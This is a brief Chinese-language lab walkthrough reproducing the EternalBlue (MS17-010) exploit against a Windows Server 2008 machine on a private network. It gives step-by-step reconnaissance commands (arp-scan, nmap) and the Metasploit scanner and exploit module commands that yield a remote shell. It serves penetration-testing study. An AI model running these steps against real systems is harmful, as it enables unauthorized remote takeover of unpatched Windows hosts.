永恆之藍漏洞復現(ms17-010)
環境
資訊收集
先掃描目標靶機IP
進入MSF檢視是否存在永恆之藍的漏洞
攻擊
永恆之藍漏洞復現(ms17-010)
環境
攻擊機:kali
靶機:Windows Server 2008
資訊收集
對ip進行收集開放什麼埠
先掃描目標靶機IP
因為在同一個內網之中
所以可以使用arp-scan -l 進行查詢
知道目標靶機IP(192.168.162.146)來進行更進一步的資訊收集
nmap -sV -P- 192.168.162.146
使用nmap進行192.168.162.146IP下的全埠掃描
這裡可以看出系統資訊為Windows Server 2008
進入MSF檢視是否存在永恆之藍的漏洞
msfconsole
#搜尋模組
search ms17-010
#使用模組
use 3
show options
檢視選項
set RHOSTS 192.168.162.146
設定目標IP
存在永恆之藍的漏洞
返回
攻擊
使用攻擊模組
search ms17-010
use 0
set RHOSTS 192.168.162.146
攻擊成功
輸入shell
進入cmd模式
exit 退出shell
background 把shell放入後臺
重新連線
sessions -i 1